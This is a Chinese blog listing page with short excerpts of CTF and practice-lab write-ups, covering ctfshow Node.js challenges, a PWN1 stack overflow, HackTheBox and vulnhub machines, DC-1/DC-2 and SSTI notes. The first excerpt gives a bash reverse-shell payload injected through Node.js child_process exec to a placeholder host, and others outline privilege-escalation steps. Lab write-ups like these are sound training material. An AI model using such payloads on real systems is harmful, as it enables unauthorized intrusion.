- 博客(17)
- 收藏
- 关注
RSS订阅原创 ctfshow nodejs系列
exec('bash -c \"bash -i >& /dev/tcp/vps/443 0>&1\"') 调用child_process库的exec函数,去执行一个bash的反弹shell,将query的值改成这个。分析一下代码,当a和b都不是null的时候,长度相等,a和b不相等,将a+flag和b+flag分别md5的时候,他们全等,输出flag,想起了php的数组绕过,res.query是获取get传参。return res.json({ret_code: 2, ret_msg: '登录失败'});
2023-04-10 13:42:26
140
原创 nssctf [CISCN 2019华北]PWN1
通过v1的值覆盖到v2的地址,将小数转成十六机制,发送使v2的值就等于11.2815。还有个思路就是我们覆盖返回地址为system("cat /flag")的地址。我们可以输入v1的值,当v2的值是11.28125的时候,查看文件内容。所以v1离v2的距离是0x30-0x4,并且11.2815的十六进制是。发现func函数,点进去查看函数具体代码。发现开启了栈不可执行和部分地址随机化。checksec查看保护机制。v1离rbp的距离是0x30。看到了逻辑,v2的值0.0。v2离rbp的距离是0x4。
2023-03-08 20:22:02
586
原创 hackthebox-Investigation,CVE-2022-23935,nc传递文件,windows日志审计,逆向/usr/bin/binary文件,perl反弹shell
CVE-2022-23935利用,tcpdump的简单监听,burpsuite抓取上传文件时候修改文件名如果包含'/'会被转义,如果没有msg打开文件可以使用网站查看,和使用网站下载附件,windows日志审计,使用Decompiler Explorer反汇编可执行文件,perl的反弹shell,阅读代码的能力
2023-02-12 14:55:48
491
原创 hackthebox-stocker,nmap,gobuster扫描vhost,nodejs sql注入,Skia/PDF漏洞
nmap,gobuster扫描vhost,nodejs sql注入,Skia/PDF漏洞,目录穿越提权
2023-02-11 22:20:44
457
原创 hackthebox-soccer
信息收集,文件上传,获取反弹shell之后的信息收集,websocket的sql注入,doas dstat的插件提权
2023-02-09 22:53:32
304
原创 vulnhub Troll2
shellshock Bash cve-2014-6271漏洞。用户名是noob尝试登录(用户名提示很明显了拉)渗透机ip:192.168.126.137。提示用Tr0ll登录Tr0ll:Tr0ll。靶机ip:192.168.126.208。计算md5值,发现2不一样,查看。爆破lmao.zip获取密码。把访问的目录的图片下载下来。绕过shellshock。由于不会pwn直接exp。
2023-01-30 15:24:28
97
原创 vulnhub Troll1
发现RETR了一个文件叫做secret_stuff.txt,ftp传输文件的协议是ftp-data。告诉我们找到了sup3rs3cr3tdirlol 很奇怪,可能是http的命令,目录尝试访问。发现this_folder_contains_the_password里面放着一个文件。这种就不用说了吧,定时任务提权,写个反弹shell啥的就行了。成功,发现了另一个文件叫做roflmao下载下来尝试运行。发现ftp和ssh和http服务,尝试匿名登录ftp。arp-scan -l扫描存活主机,发现靶机。
2023-01-30 14:34:07
107
原创 vulnhub Wintermute
这次这个靶机让我学到挺多的,不过离谱的是师傅们做的时候,一定要仔细的配置靶机的网络。这个靶机是vbox打开的。渗透机IP:192.168.10.5靶机:第一张网卡IP: 192.168.10.6第二章网卡IP: 192.168.11.7。
2023-01-29 14:43:29
422
原创 vulnhub SolidState
靶机开放22/ssh、 25/smtp、80/http、 110/pop3、119/nntp、4555/james-admin等端口服务。setpassword username password 修改username的password。扫描靶机ip地址(这边我习惯arp-scan扫描)listusers 列出已经存在的用户。发现发送过来了mindy的用户名密码。root/root弱口令登录成功。发现定期执行tmp.py文件。在mindy的retr 2。-O 扫描靶机操作系统。-p- 扫描全部端口。
2023-01-28 16:32:23
79
原创 vulnhub zico2
但是尝试了data://text/plain,和php://input 不起作用,没有思路。firefart是我之前打过一遍,使用脏牛提权的用户,不用在意,发现有一个用户zico。在/home/zico/wordpress/wp-config.php。在创建一个新的表,里面写入
2023-01-28 12:10:00
99
原创 vulnhub pWnOS_v2.0
尝试着去做一些ctf题目和靶机,vulnhub的难度还是非常的友好,熟悉一下。这个靶机pWnOS_v2.0还是需要自己配置网络地址的。
2023-01-27 15:18:56
161
原创 DC-2靶机
将/etc/hosts手动将ip地址解析为dc-2。提示你不能执行wordpress的化,尝试其他的路。发现jerry怎么都成功不了,使用tom登录进去了。我们使用专门的工具进行后面的渗透,wpscan。让我们使用cewl提取网页出来作为密码字典。7744端口服务是raqmon-pdu。这边写错了应该写为/bin/bash。发现80端口和7744端口是开放的。发现是一个wordpress网站。将用户存放到user字典进行爆破。意思是我们可以su到jerry。发现网站url自动跳转为。
2022-12-29 18:08:13
126
原创 DC-1靶机
发现脚本/var/www/scripts/password-hash.sh。发现配置文件/sites/default/settings.php。发现flag2,告诉我们不要爆破,只有登录数据库一条路。使用msfconsole寻找漏洞进行攻击。经过测试find执行的命令是root权限。修改admin的密码为123456。发现users的表密码是加盐的值。然后回到网站登录发现flag3。加密成功替换之前数据库的密码。告诉我们需要find执行。我们寻找本地加密的脚本。提示我们寻找配置文件。
2022-12-29 18:01:36
52
原创 学习ssti
ssti也叫做模板注入当不正确的使用模板引擎进行渲染时,则会造成模板注入比如render_template_string函数,当参数可控时,会造成模板注入在Python的ssti中,大部分是依靠基类->子类->危险函数的方式来利用sstipython沙箱逃逸总结 这是别人的文章__class__ 返回对象所属的类__bases__以元组的形式返回一个类所直接继承的类__base__以字符串返回一个类所直接继承的类。__mro__返回解析方法调用的顺序。__su
2022-11-23 13:00:30
370
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人